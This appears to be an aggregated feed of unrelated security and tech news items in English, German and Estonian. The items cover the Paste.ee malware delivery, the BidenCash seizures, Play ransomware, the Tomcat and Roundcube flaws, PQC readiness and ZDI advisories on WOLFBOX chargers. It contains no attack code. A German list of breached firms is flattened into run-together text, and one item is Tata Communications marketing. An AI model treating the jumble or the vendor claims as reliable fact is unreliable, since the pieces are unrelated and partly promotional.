The widespread text-sharing website Paste.ee has been used as a weapon by bad actors to spread powerful malware strains like XWorm and AsyncRAT, which is a worrying trend for cybersecurity professional. This tactic represents a significant shift in phishing and malware delivery strategies, exploiting a trusted service to bypass traditional security defenses. Unveiling a New […] The post Paste.ee Turned Cyber Weapon: XWorm and AsyncRAT Delivered by Malicious Actors appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

The U.S. government has seized approximately 145 domains associated with the BidenCash marketplace and other criminal marketplaces, effectively dismantling one of the most notorious darknet operations for trafficking stolen credit card data and personal information.  Announced by the U.S. Attorney’s Office for the Eastern District of Virginia, this sweeping operation targeted both darknet and surface web domains. According to court records, the U.S. also obtained authorization to seize cryptocurrency wallets used by BidenCash to process illicit payments, further choking off the revenue stream that sustained its criminal operations.  BidenCash Marketplace: A Hub for Cybercrime  Launched in March 2022, the BidenCash marketplace quickly gained notoriety in the criminal underworld. Operating as a one-stop shop for stolen financial data, the marketplace offered credit card numbers, expiration dates, CVV codes, and even personal identification details such as names, addresses, phone numbers, and emails. For each transaction facilitated on the site, BidenCash administrators collected a fee.  Over time, the platform grew to serve more than 117,000 users and facilitated the trafficking of over 15 million payment card records. In just under two years, it generated over $17 million in revenue.  To boost their visibility and expand their user base, BidenCash operators engaged in marketing strategies more often seen in legitimate businesses, such as promotional giveaways. Between October 2022 and February 2023, they released 3.3 million stolen credit card records for free, hoping to attract more buyers to their services.  The BidenCash marketplace wasn't limited to payment card data. It also offered stolen credentials to access computers, effectively enabling a range of unauthorized and potentially destructive cyber intrusions.  Beyond BidenCash: Ongoing Crackdown on Cybercrime Syndicates  This isn’t the first time federal authorities have disrupted cybercrime infrastructures. In a related case, the Department of Justice previously seized four domains tied to a crypting service—a software-based method for concealing malware from antivirus detection. These crypting and counter-antivirus (CAV) services allowed cybercriminals to deploy more advanced and undetectable malicious software, often linked to ransomware attacks.  According to an affidavit, undercover agents made purchases from the seized sites and traced connections to known ransomware groups operating in the U.S. and abroad, including in Houston. “Modern criminal threats require modern law enforcement solutions,” said U.S. Attorney Nicholas J. Ganjei. “This investigation struck at the infrastructure enabling cybercriminals, not just the end users.”  FBI Houston Special Agent in Charge Douglas Williams echoed the sentiment: “Cybercriminals don’t just create malware; they perfect it for maximum destruction.”  Operation Endgame: A Global Effort  These seizures were part of Operation Endgame, a multi-national law enforcement initiative focused on dismantling malware and cybercriminal services worldwide. On May 27, coordinated actions by U.S., Dutch, Finnish, German, French, and Danish authorities led to the takedown of several domain infrastructures supporting criminal activity.  The FBI Houston Field Office, along with the U.S. Secret Service and international partners, played a pivotal role in this effort. Assistant U.S. Attorneys Shirin Hakimzadeh and Rodolfo Ramirez are leading the prosecution, with AUSA Kristine Rollinson overseeing the seizures.  Earlier in May, another operation saw the seizure of nine DDoS-for-hire sites, commonly known as booter or stresser services. These services allow paying users to launch Distributed Denial-of-Service (DDoS) attacks, disrupting internet access for individuals, schools, government agencies, and gaming platforms.  The FBI and Poland’s Central Cybercrime Bureau, which arrested four site administrators, discovered that these sites had facilitated hundreds of thousands of DDoS attacks globally. While the services claimed to be for “network testing,” evidence showed they were routinely used to attack third-party systems.  Assistant U.S. Attorney Bill Essayli for the Central District of California stated, “Booter services facilitate cyberattacks that harm victims and compromise everyone’s ability to access the internet.”

What does it take to be a leader and recognised year on year? In short, it is a testament to customer trust, of continued innovation and leadership in delivering future-ready network solutions. For any company to be successful, it is vital to have a clear vision of the company’s roadmap, which provides strategic direction and focus. It ensures employees and all stakeholders understand the company’s goals, and paves the way for better decision-making. To be recognised as a leader repeatedly surely speaks volumes about a company’s vision, strengths, and the ability to help enterprises succeed in a hyperconnected environment. Trust as the foundation to digital success Trust underpins all forms of economic activity and forms the foundation of our society. Trust has always been built through interpersonal relationships over time. An IDC report commissioned by Tata Communications notes that “Building trust and being trusted in the digital realm are not options. If you are not trusted online, you will not be able to transact online”. In today’s digital realm, organisations must give their stakeholders the confidence that they have the necessary measures to secure any transaction they conduct. Trust drives businesses, and digital trust drives digital businesses. 12 reasons to trust Tata Communications as a leader for global WAN services Why are we the trusted partner for enterprises to help them succeed in a digital-first world, for 12 consecutive years? Here are 12 reasons why: We run the world’s largest wholly owned subsea cable network.  Together with our strategic investments in other cable systems, we operate 500,000+ km of subsea optical fibre. Enterprises can achieve their global ambition with borderless growth. We operate a global Tier-1 IP network, with customers accounting for over one-third of the world’s internet routes.  Our internet edge capacity reaches 250 Tbps. Enterprises can have shorter paths with more resilient and secure internet connections, augmented by native threat intelligence and DDoS. Our IZO™ Internet WAN is the world’s first predictable internet services with guaranteed performance. It evolves to encompass different service variants including broadband internet, 4G/5G and satellite access, spanning across 150+ countries. Enterprises global access needs can be met with comprehensive, best fit solutions. We support a software-defined cloud interconnect service, IZO™ Multi Cloud Connect, with a 100% availability SLA, connecting the global cloud giants. Enterprise cloud connectivity can be simple and agile to satisfy changing needs. Our Network-as-a-Service (NaaS) comes with comprehensive options and zero-based bandwidth on a pay-as-you-go model. It can scale up to 100 Gbps and cover Private Line, MPLS, VPN, and internet services. Enterprises have a flexible consumption model for core network connectivity. We provide SDWAN-as-a-Service (SDWANaaS) and Wi-Fi-as-a-Service (WiFiaaS) with a “cloud-like” consumption model. Enterprises can avoid technical debt and have a faster provisioning lead time. We support Hosted SASE, which runs single vendor technology over our global network to offer a single-pass security advantage. We also have Hybrid SASE, which combines multi-vendor SDWAN and SSE. With 3.5TB of data analysed daily, 8K+ IOCs detected and blocked, and native SOAR enhancing MTTD and MTTR by 99%, we deliver cutting-edge network protection. Enterprise network and security needs can also be integrated with a single dashboard and management panel. We enable virtual network functions (VNFs), both at the gateway and cloud edge locations, as well as on premises as universal CPE. Enterprises do not need to invest in single integrated devices that lack flexibility and have longer delivery lead times. We maintain 99.8% first-time right deployments of SDWAN managed services and Security Service Edge, and over 95% of incidents are proactively identified by our management platform. Enterprises can be assured of smooth service migration with shorter incident resolution times. We offer simple, intelligent Managed Wi-Fi & LAN with multiple vendors and service packages. Enterprises’ end user experience is improved with better coverage, easier guest access, and the usage analytics required by business growth. Our unique AXIOM managed services framework, which focuses on “Assess, eXecute, Integrate, Operate & Manage”, takes care of the entire management lifecycle across Day 0, Day 1, and Day 2, augmented by value-added services. Enterprises can ensure that their network management staff focus on their core business. Our TCX platform helps manage the network with greater visibility, control, and ease. Enterprises can manage the entire lifecycle from design, delivery, and operations from a single pane of glass. Find out more about Tata Communications’ network solutions here.

A joint advisory from the US and Australian authorities states that Play ransomware has hit approximately 900 organizations over the past three years. A joint advisory from the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) states that Play ransomware has hit […]

A critical memory leak vulnerability in Apache Tomcat’s HTTP/2 implementation (CVE-2025-31650) has been weaponized, enabling unauthenticated denial-of-service attacks through malformed priority headers. The flaw affects Tomcat versions 9.0.76–9.0.102, 10.1.10–10.1.39, and 11.0.0-M2–11.0.5, with public exploits already circulating 12. Vulnerability Mechanics and Attack Vector According to the report, the vulnerability stems from the improper cleanup of failed […] The post PoC Exploit Released for Apache Tomcat DoS Vulnerability appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Riigikogu kiitis 4. juunil 75 poolthäälega heaks seaduseelnõu, mis võimaldab inimestel kasutada Eesti riigiäppi oma isiku tõendamiseks. Uus lahendus muutub kasutatavaks juulis.

Recently, several important Swedish services have been hit by distributed denial-of-service attacks: a few weeks ago it was Swish, before that it was Bank-id, and when the tax return period started in March, the DDoS guns were aimed at the Swedish Tax Agency. DDoS attacks are an interesting phenomenon that is often not easy to pinpoint on the scale between a prank and warfare, even when you know who is behind them. Sweden is not the only country affected either, last week the Netherlands Cyber Security Centre issued a statement saying that the pro-Russian hacktivist group NoName057(16) had launched a series of DDoS attacks against organizations in the country. The same group has also claimed several DDoS attacks in the UK. The usual DDoS attack can usually be traced back to so-called hacktivists, a kind of digital marauders who want to draw attention to a particular issue and create chaos and unrest. A DDoS attack is relatively easy and cheap to carry out; just a month ago Europol shut down a network of DDoS services that offered attacks for as little as 100 kroner. While these hacktivists often operate under some form of government wing, making them more than just the digital equivalent of “Restore the Wetlands”, I still think it makes sense to treat the DDoS attacks more as activists than as part of a hybrid war. Although they absolutely can be. Because without playing it down too much, the DDoS attacks are not doing much damage. Of course, it’s not good that Swish or Bank-id are down for a few hours, but it’s not a threat to society either. It bothers me a bit that there are always critics who go on and on about poor resilience, “our vulnerable digital society” and the risks of being so dependent on a few services. These things are important to talk about, but bringing them up in the context of these attacks is exactly what the hacktivists want. It also puts the focus and responsibility on the victims, even though they have done a pretty good job of protecting themselves. The services are back up and running. Few people blame the Swedish Transport Administration when the Essingeleden road jams because climate activists have glued themselves to the roadway, or the airport when the same group of activists prevents a plane from taking off from Malöga. But in some people’s eyes, it seems that those providing digital services need to spend their entire IT budget with Cloudflare to avoid criticism. Fortunately, Swedish mainstream media have gotten better at reporting on these things. Of course, there are blaring headlines and push notifications that the services are down, but I have also seen experts be called quite quickly to provide context. This makes it easier to avoid mass hysteria and for the activists to achieve their goals, if we are talking about resilience. Of course, we should take seriously, discuss, and deal with the fact that rogue states have the ability to disrupt services that are important to citizens. But in practice, it is best to handle the attacks like activists stuck on the E4 highway — you may find it annoying and perhaps get angry, but when the road reopens, you drive on. Stronger reactions than that only play into the hands of the “hacktivists”.

The European Commission and the High Representative for Foreign Affairs and Security Policy have jointly launched the European Union’s International Digital Strategy, laying out a comprehensive framework to guide the EU’s external digital engagement. The EU International Digital Strategy comes at a time when the global digital model is increasingly shaped by rapid technological advances and geopolitical challenges.  Framed as a roadmap for international cooperation and governance in the digital age, the strategy outlines the EU’s commitment to promoting secure, inclusive, and rules-based digital transformation around the world. It also reaffirms the alliance’s aim to position itself as a reliable and stable digital partner for both established allies and emerging economies.  EU International Digital Strategy: A Three-Pronged Strategic Framework  The EU’s new digital strategy is structured around three core objectives:  Expanding International Partnerships The EU aims to broaden its global digital footprint by deepening existing Digital Partnerships and Dialogues, initiating new alliances, and launching a Digital Partnership Network. This network will support bilateral and multilateral cooperation while also enhancing both the EU’s and its partners' digital resilience and competitiveness.  Deploying the EU Tech Business Offer A cornerstone of the strategy is the deployment of a tailored EU Tech Business Offer, a collaborative public-private initiative to support digital transformation in partner countries. This package will incorporate investments in AI, cybersecurity, digital public infrastructure, secure connectivity, and other critical technologies. The effort will be coordinated through the Team Europe approach, integrating Member State participation and financial instruments.  Strengthening Global Digital Governance The EU reaffirms its intention to lead in shaping a global, rules-based digital order. This includes advancing governance frameworks for emerging technologies, updating internet governance structures in line with developments like Web 4.0, and promoting human rights, democracy, and online safety standards globally.  Focus Areas for International Collaboration  Under the strategy, the EU will work with partner countries across several priority areas:  Secure and Trusted Digital Infrastructure Investments will support infrastructure critical to sectors such as health, finance, energy, and transport, aimed at fostering safe and dependable digital ecosystems.  Emerging Technologies Cooperation will include joint efforts on next-generation technologies, including artificial intelligence, 5G/6G networks, quantum computing, and advanced semiconductors.  Digital Governance The strategy places strong emphasis on regulatory models that uphold democratic values, social cohesion, and the protection of individual rights in digital environments.  Cybersecurity Efforts will focus on boosting the cyber defence capabilities of partner countries, which the EU sees as integral to its own digital security landscape.  Digital Identity and Public Infrastructure The EU seeks to advance interoperable digital identity systems and establish mutual recognition agreements to simplify cross-border interactions for businesses and citizens.  Online Platforms Ongoing priorities include safeguarding freedom of expression, ensuring online child protection, and supporting transparent digital ecosystems.  Expanding a Network of Digital Cooperation  The EU has already built a foundation for external digital engagement through a variety of platforms, including:  Over 30 digital and regional partnerships, Trade and Technology Councils, and thematic dialogues.  A strong digital trade ecosystem, with digital services trade valued at €3 trillion in 2024.  Major infrastructure projects like the 7,100 km-long Medusa cable across the Mediterranean, enhancing secure connectivity between Europe and North Africa.  The strategy’s public-private cooperation model aims to expand this existing infrastructure and strengthen regional connectivity.  Towards Rules-Based Digital Governance  One of the key messages of the strategy is the EU’s intent to uphold and promote a global digital environment anchored in democratic principles and international law. This includes:  Promoting regulatory standards for key digital technologies.  Advancing internet governance mechanisms to accommodate emerging technologies such as Web 4.0.  Supporting frameworks that ensure the global availability and integrity of the internet.  The EU’s vision emphasizes governance models that integrate both technological innovation and legal safeguards to protect users and institutions alike.  Background and Consultation Process  The strategy follows the European Council’s April 2024 directive calling for stronger EU leadership in digital affairs. In preparation, the European Commission issued a public call for evidence in May 2024, inviting feedback from a broad spectrum of stakeholders, including tech firms, civil society, academic institutions, trade bodies, and EU Member States.  This consultative approach aimed to incorporate diverse perspectives on how the EU can align its international digital policies with evolving geopolitical and technological trends.  Next Steps  Following today’s announcement, the Commission and the High Representative plan to present the strategy in a series of stakeholder events across EU institutions and partner countries. These sessions will serve as platforms to discuss implementation frameworks and mobilize the necessary public and private support to operationalize the proposed initiatives.  Implementation is expected to begin immediately after these consultations, with a focus on translating policy into practical cooperation projects and regulatory models.

A recent spearphishing campaign targeting Polish entities has been attributed with high confidence to the UNC1151 threat actor, a group linked to Belarusian state interests and, according to some sources, Russian intelligence services. CERT Polska reports that the attackers leveraged a critical vulnerability in the Roundcube webmail platform—CVE-2024-42009—to steal user credentials with minimal user interaction. […] The post Hackers Exploit Roundcube Vulnerability to Steal User Credentials via XSS Attack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Lesen Sie, welche Unternehmen in Deutschland aktuell von Cyberangriffen betroffen sind.Roman Samborskyi | shutterstock.com Sie denken, Ihre Sicherheitsmaßnahmen können Sie langfristig vor Cyberangriffen schützen? Oder dass Ihr Unternehmen zu klein und damit uninteressant für Hacker ist? Egal, ob Sie dem Mittelstand angehören, an der Börse gelistet sind oder zu den kritischen Infrastrukturen gehören: Jedes Unternehmen hat Daten, die Cyberkriminelle stehlen möchten. Im Jahr 2024 wurden viele deutsche Unternehmen Opfer einer Cyberattacke. Die Folgen der Angriffe, die meist mittels Ransomware erfolgten, waren Betriebsstörungen gefolgt von Umsatzeinbußen, hohe Kosten für die Datenwiederherstellung sowie Reputationsschäden. Auch für 2025 ist die Gefahr durch Cyberkriminelle hoch. Diese deutschen Unternehmen wurden bisher attackiert: UnternehmenWannWasQuelleUnterwegs Outdoor ShopJuni 2025CSOWellteamMai/Juni 2025CSOVolkswagen GroupJuni 2025RansomwareCSOFunktel GmbHJuni 2025Ransomwarewww.ransomware.liveArcona Hotels & Resorts-GruppeMai 2025RansomwareCSOAdidasMai 2025CSOArla Foods Deutschland Mai 2025CSOROS RollentechnikMai 2025Ransomwarewww.ransomware.liveAutohaus JürgenMai 2025come-on.deRichard Scholz GmbH (BVG-Dienstleister)April/Mai 2025Datendiebstahl (BVG-Kundendaten)CSOReutlinger General-AnzeigerMai 2025Reutlinger General-AnzeigerOettingerApril 2025RansomwareCSOguenstiger.deApril 2025RansomwareCSOJ. Dahmen GmbH & Co. KG (JDC)April 2025DSGV-PortalRheinmetallApril 2025Ransomwarewww.ransomware.liveFAKO-M GetränkeApril 2025FAKO-M GetränkeSamsung Deutschland April 2025Datendiebstahl (Angriff über IT-Dienstleister Spectos)CSOHofmann Fördertechnik März 2025Ransomware?CSOHeilbronn MarketingMärz 2025RansomwareCSOFKM ElementeMärz 2025Ransomwarewww.ransomware.liveSozial-Holding MönchengladbachMärz 2025RansomwareCSOAerticketMärz 2025Ransomware?CSOQ railingMärz 2025Ransomwarewww.ransomware.liveStadtwerke SchwerteMärz 2025CSOWillms FleischFebruar 2025RansomwareCSOSüdkabelFebruar 2025suedkabel.deMETA E²F OperationsFebruar 2025RansomwareDSGVO-PortalAutohaus KießlingFebruar 2025RansomwareFalconFeeds.ioStürmer MaschinenFebruar 2025RansomwareCSOInSystFebruar 2025RansomwareCSOPamyraFebruar 2025RansomwareDSGVO-PortalVorwerkFebruar 2025DatendiebstahlCSOEscadaFebruar 2025RansomwareCSOEckert & ZieglerFebruar 2025www.ezag.com3 Screen SolutionsFebruar 2025UndercodenewsHEMIFebruar 2025RansomwareDSGVO-PortalAlltoursFebruar 2025AlltoursNeovita CosmeticsJanuar 2025RansomwareDSGVO-PortalWürttemberger MedienJanuar 2025RansomwareDSGVO-PortalSchauinsland ReisenJanuar 2025CSOGrohe AGJanuar 2025RansomwareCSOD-TrustJanuarZugriff auf DatenCSOTelering MarketingJanuar 2025RansomwareRansomware.liveWeininger Metall SystemJanuar 2025RansomwareCSO Diese Unternehmen wurden im Jahr 2024 Opfer einer Cyberattacke: UnternehmenWannWasQuelleVosskoNovember 2024RansomwareCSOAEPOktober 2024RansomwareCSOIDEAOktober 2024RansomwareCSOSchweiger TransportOktober 2024RansomwareRansomware.liveHuber GroupOktober 2024 Celleheute.deSchäfer dein BäckerSeptember 2024RansomwareCSODiehl DefenceSeptember 2024SpywareCSOSchumag AGSeptember CSOClatronic InternationalSeptember 2024RansomwareRansomware.liveCBTSeptember 2024RansomwareRansomware.liveSybitAugust 2024PhishingCSOOptibeltAugust 2024 CSOMelchersJuli 2024RansomwareCSOSunExpressJuli 2024 CSOMittelbadische Entsorgungs- und Recyclingbetriebe (MERB)Juli 2024 CSOEurostrandJuli 2024Ransomware?CSOTÜV Rheinland AkademieJuli 2024RansomwareCSOLambertzJuni 2024RansomwareCSOMeiller KipperJuni 2024 https://www.meiller.com/de/wichtige-information/DG Immobilien ManagementJuni 2024 CSOWestfälische StahlgesellschaftJuni 2024Ransomwarehttps://www.ws-stahl.de/faq-zum-cyberangriff-vom-9-juni-2024/HoppeckeAnfang Juni 2024RanomwareCSOLemkenMai 2024 CSODeutsche TelekomMai 2024Ransomware?CSOMelting MindApril 2024RansomwareCSOMax WildApril 2024 https://www.maxwild.com/unternehmen/news/cyberangriff-auf-max-wild-gmbh/Bieler + LangApril 2024 bieler-lang.deHospitaltechnik PlanungsgesellchaftApril 2024 https://www.ht-hospitaltechnik.de/news/391-aktueller-cybervorfall-bei-der-ht.htmlGBI-Genios Deutsche WirtschaftsdatenbankApril 2024 CSOThyssenkruppFebruar 2024 CSOPSI SoftwareFebruar 2024 CSOKind HörgeräteFebruar 2024 CIOVartaFebruar 2024 CSOAnydeskFebruar 2024 CSOUnfallkasse ThüringenDezember 2023/ Januar 2024RansomwareCSOODAV AGJanuar 2024 CSOTransdevJanuar 2024 CIO Diese Unternehmen wurden im Jahr 2023 Opfer eines Hackerangriffs: UnternehmenWannWasQuelleJunghans-Wolle/ Pro IdeeDezember 2023RansomwareCSOAllgaier AutomotiveDezember 2023 filstalwelle.deErfo BekleidungswerkDezember 2023RansomwareCSOKaDeWeNovember 2023RansomwareCSOBauer AG  CIOSüdwestfalen ITOktober 2023RansomwareCSOMotel OneOktober 2023RansomwareCSOHäffnerOktober 2023RansomwareExplodingsecurityHochsauerlandWasser, Hochsauerland EnergieSeptemberr/Oktober 2023RansomwareCSOdegenia Versicherungsdienst AGSeptember/Oktober 2023 CSOMedgateAugust/September 2023 MedgateKendrion Kuhnke MalenteAugust 2023 CSOTrinkwasserverband StadeAugust 2023 CSOWildeboerJuli 2023RansomwareCSOSoftProjektJuli 2023RansomwareSoftProjektIT-Dienstleister der BarmerJuni 2023Software-SchwachstelleCSOVerivoxJuni 2023Software-SchwachstelleCSOMedizinischer DienstJuni 2023 CSODeutsche LeasingJuni 2023 CSOVerlagsgruppe VRMEnde Mai 2023 CSOHosting-Dienstleister von DenaMai 2023RansomwareCSOUnited HosterMai 2023RansomwareCSODienstleister von Heineking MediaMai 2023 CSOBlack Cat NetworksMai 2023RansomwareCSOGITAIMai 2023RansomwareCSOMaxim GroupAnfang Mai2023RansomwareCSOLux Automation RansomwareCSOBilstein GruppeEnde April 2023RansomwareCSOStürtz Maschinenbau22. April 2023RansomwareDSGVO PortalBadische Stahlwerke20. April 2023 CSOJobrad RansomwareCSOBitmarckApril 2023 CSOLürssenApril 2023RansomwareCSOEvotec6. April 2023 CIOÜstra31. März 2023 CSOBIG direkt28. März 2023 Ruhr NachrichtenMaterna25. März 2023 CSOSAF HollandMärz 2023 CIOMatthäi17. März 2023RansomwareCSOEnergieversorgung Filstal13. März 2023DDoSCSORheinmetall, NW7. März 2023DDoSCIOSteico, BY1. März 2023n.a.CSOSmart InsurTech, BE10. Februar 2023n.a.Smart InsurTechAlbert Ziegler, BW9. Februar 2023n.a.CSOUnternehmen in Bayern, BY6. Februar 2023RansomwarePolizei BayernKapellmann und Partner Rechtsanwälte, NW3. Februar 2023RansomwareKapellmannHäfele, BW2. Februar 2023RansomwareCSOStadtwerke Karlsruhe, BW1. Februar 2023RansomwareCSODürr, BWFebruar 2023n.a.CSOBayerischer Rundfunk, BYFebruar 2023PhishingCSOGeze, BWFebruar 2023n.a.GezeWisag Dienstleistungsholding, HEFebruar 2023n.a.Frankfurter Allgemeine ZeitungFlughafen Hamburg, HH25. Januar 2023DDoSHamburger AbendblattPlüsch-Tierheim, NW24. Januar 2023n.a.CSOSky Deutschland, BY21. Januar 2023n.a.Digital FernsehenBitmarck, NW19. Januar 2023n.a.CSOFritzmeier Group, BY17. Januar 2023n.a.CSOAdesso, NW11. Januar 2023n.a.CSOUnternehmen in Kaiserslautern, RPJanuar 2023Social EngineeringCSO Diese Unternehmen wurden im Jahr 2022 Opfer einer Cyberattacke: UnternehmenWannWasQuelleIBB Business Team, BE27. Dezember 2022RansomwareIBB Business TeamSSI Schäfer Shop, RP23. Dezember 2022n.a.Schäfer Shop LinkedInThyssenkrupp, NRW  20. Dezember 2022n.a.CSOH-Hotels, HE11. Dezember 2022n.a.H-HotelsMeyer & Meyer, NI6. Dezember 2022n.a.CSORosenschon Partnerschaft, BY5. Dezember 2022n.a.Bayreuter TagblattDeutsche Klassenlotterie Berlin, BEDezember 2022n.a.Berliner KurierLand Brandenburg Lotto, BBDezember 2022n.a.RBB 24Lotto-Toto Sachsen-Anhalt, STDezember 2022n.a.MDRNordwest Lotto Schleswig-Holstein, SHDezember 2022n.a.FocusLotto Rheinland-Pfalz, RPDezember 2022n.a.SWRTechnolit, HEDezember 2022n.a.Technolit FacebookT-Mobile, NW25. November 2022n.a.CSOLandau Bedia, BE25. November 2022n.a.Landau MediaBisping & Bisping, BY17. November 2022n.a.Nürnberger NachrichtenRichard Wolf, BW3. November 2022RansomwareRichard WolfProphete, NWNovember 2022n.a.CSOOase, NRW29. Oktober 2022n.a.OaseAurubis, HH28. Oktober 2022n.a.CIOEnercity, NI26. Oktober 2022n.a.CIODeutsche Presse Agentur, HH17. Oktober 2022RansomwareCSOMetro, NRW17. Oktober 2022n.a.CSOHeilbronner Stimme, BW14. Oktober 2022RansomwareCIOWilken Software Group, BW12. Oktober 2022RansomwareCSOConvista, NRW10. Oktober 2022Zero DayConvistaHipp, BY5. Oktober 2022n.a.BR24Caritasverband München und Freising, BY11. September 2022RansomwareCSOElabs, HE8. August 2022n.a.ElabsMedi, BY7. August 2022n.a.CSOIHK, deutschlandweit4. August 2022DDoSCSOSemikron, BY1. August 2022RansomwareCSOContinental, NIAugust 2022n.a.CIOAutodoc, BEAugust 2022n.a.Skoda CommunitySaller-Bau, THAugust 2022n.a.Thüringer AllgemeineIsta, NW27. Juli 2022n.a.CSOASG, NI26. Juli 2022n.a.CSOWeidmüller, NW18. Juli 2022n.a.Neue WestfälischeHelinet, NW7. Juli 2022DDoSWestfälischer AnzeigerKnauf, BY29. Juni 2022n.a.KnaufBizerba, BW27. Juni 2022n.a.Schwarzwälder BoteApetito, NW26. Junin.a.CSOCount + Care, HE12. JuniRansomwareWissenschaftsstadt DarmstadtBauverein, HE12. JuniRansomwareFrankfurter RundschauHeag und Heag Mobilo, HE12. Juni 2022RansomwareFrankfurter RundschauFES, HE12. Juni 2022RansomwareCIOEntega, HE12. Juni 2022RansomwareCSOStadtreinigung Kassel, HE2. Juni 2022n.a.WeltSDZ Druck und Medien, BW31. Mai 2022n.a.Schwäbische PostJakob Becker, RP24. Mai 2022RansomwareCSOPosteo, BE17. Mai 2022DDoSCSOAGCO, BY5. Mai 2022RansomwareAGCOLudwig Freytag,NIMai 2022RansomwareNDRCWS, NWMai 2022n.a.Westfalen BlattSixt, BY29. April 2022n.a.CSODonau Stadtwerke Dillingen-Lauingen, BY18. April 2022n.a.Augsburger AllgemeineReitzner, BY18. April 2022n.a.Augsburger AllgemeineAHS, HH17. April 2022n.a.AirlinersIMA Schelling Group, NW15. April 2022n.a.Neue WestfälischeDeutsche Windtechnik, HB12. April 2022RansomwareCSOPerbit, NW7. April 2022RansomwareCSOKSB, ST7. April 2022n.a.MDRFraunhofer-Institut, STApril 2022RansomwareCSOTÜV Nord Group, NIApril 2022n.a.TÜV Nord GroupNordex, HH31. März 2022n.a.NordexWelcome Hotels, HE12. März 2022n.a.Welcome HotelsStollwerck, TH11. März 2022n.a.MDRElobau, BW4. März 2022RansomwareElobauBauking, NW3. März 2022RansomwareWestfalenpostRosneft, BEMärz  2022n.a.WeltTST, RPMärz 2022n.a.SWRTrützschler, NWMärz 2022RansomwareWDRFunke Mediengruppe, NW25. Februar 2022BotsDie ZeitKlopotek, BE18. Februar 2022RansomwareCSOSchultze & Braun Rechtsanwaltsgesellschaft, BW16. Februar 2022Zero DaySchultze & BraunOtto Dörner, HHFebruar 2022RansomwareSVZWisag Dienstleistungsholding, HE27. Januar 2022n.a.WisagGolfclub Hofgut Praforst, HE23. Januar 2022Ransomware­­­Osthessen NewsThalia Bücher, NW20. Januar 2022Brute ForceTarnkappeUnfallkasse Thüringen, TH4. Januar 2022RansomwareUnfallkasse ThüringenOiltanking GmbH, HHJanuar 2022n.a.Handelsblatt Die Redaktion wird diese Listen regelmäßig aktualisieren. Jedoch erheben wir keinen Anspruch auf Vollständigkeit.

In an age where laptops are getting slimmer and smartphones more powerful, there’s still a niche for compact, dedicated computing devices that offer the best of both worlds. Say hello to the NetHunter C-deck, a brilliant DIY project by s.gordienko that transforms an older Google Pixel 3 XL into a highly portable, clamshell-style palmtop. You […] The post Transform Your Old Smartphone into a Pocket Cyberdeck with Kali NetHunter first appeared on Mobile Hacker.

CISOs have been urged to demand clear post-quantum cryptography (PQC) readiness roadmaps from vendors and partners to combat the looming threat of cryptographically relevant quantum computers. Quantum computers capable of large-scale cryptographic attacks are yet to be developed but recent advances mean the threat is moving from theoretical to near-term reality, possibly within five years. During a panel at this week’s Infosecurity Europe conference, experts urged security professionals to begin transitioning to PQC sooner rather than later, alongside calls to focus on supply chain readiness. Sufficiently powerful quantum computers would be capable of breaking current asymmetric encryption, undermining the security protections underpinning the security of financial transactions, sensitive data, and secure communications. Even in advance of the arrival of sufficiently capable quantum computer (an event sometimes described as Q-Day), adversaries could carry out harvest now, decrypt later attacks. Preparing for Q-Day Organizations, especially those handling long-duration secrets, and sectors such as finance, critical infrastructure, healthcare, and telecommunications are most at risk, the Infosecurity Europe panel agreed. Karl Holmqvist, founder and chief executive of Lastwall, a provider of quantum-resilient cybersecurity products, told delegates that Q-Day will not be announced and businesses need to take action now in the face of a growing threat. “An orderly transition will cost less than emergency planning,” Holmqvist said. “It’s like Y2K but without an actual date.” Encryption methods such as RSA and ECC are considered unbreakable by classical computers because breaking them relies on factoring the products of large prime numbers or comparable tasks. Based on a fundamentally different computing architecture than classical computers, quantum computers, however, are capable of solving problems intractable to even the most powerful supercomputers, such as breaking widely used encryption methods. The threat has driven the development of quantum-resistant cryptography algorithms. The US National Institute of Standards and Technology (NIST) approved three post-quantum cryptography (PQC) standards last year for applications including digital signatures and key exchange. Organizations need to update their cryptographic systems, libraries, and hardware (such as hardware security modules) to support the new standards. The UK’s National Cyber Security Centre (NCSC) has published guidance for phased migration to quantum-secure systems by 2035. Examples of early adoption include Google’s quantum-safe digital signatures in Cloud KMS (key management services) and Cloudflare’s commitment to integrate the new PQC standards into their services, but much remains a work in progress. The IETF is working on revising and standardizing key internet protocols — such as TLS, SSH, and VPNs — to support PQC algorithms, which generally have longer key sizes and tougher performance characteristics. Some vendors are introducing hybrid PKI solutions to ensure backward compatibility and smooth migration to PQC. “CISOs need to start asking vendors if they are PQC-ready,” Holmqvist advised. Daniel Cuthbert, global head of cybersecurity research at Santander, argued quantum advancements are forcing organizations to ask critical questions about where and how cryptography is used, an often overlooked task. Quantum can be used as the stick that will allow security professionals to get approval to carry out a cryptographic inventory at their organization, alongside projects that will allow them to improve their cryptographic agility more generally, Cuthbert advised. As a first step organizations can prepare a cryptographic bill of materials to audit the use of encryption technologies by their organization. No ‘forklift upgrade’ needed There is a misconception that change is difficult but the task of modernizing systems to make them PQC-ready can be broken down into chunks, advised Anne Leslie, cloud risk and controls leader for EMEA at IBM. “Businesses can only go as fast as partners and suppliers,” Leslie cautioned. Madelein van der Hout, senior analyst at Forrester, who was not on the panel, told CSO that organizations should start to prepare for post-quantum cryptography over a five-year horizon. Van der Hout acknowledged that businesses have many priorities to balance so the speed of adoption should be aligned to their risk tolerance, internal business goals, and wider strategy. For a look at how to get started, see “The CISO’s guide to establishing quantum resilience.”

As cloud infrastructure increases in complexity, security teams are having difficulty keeping pace.

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installatons of WOLFBOX Level 2 EV Charger devices. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.0. The following CVEs are assigned: CVE-2025-5747.

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of WOLFBOX Level 2 EV Charger. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 8.0. The following CVEs are assigned: CVE-2025-5748.

This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of WOLFBOX Level 2 EV Charger devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.3. The following CVEs are assigned: CVE-2025-5749.

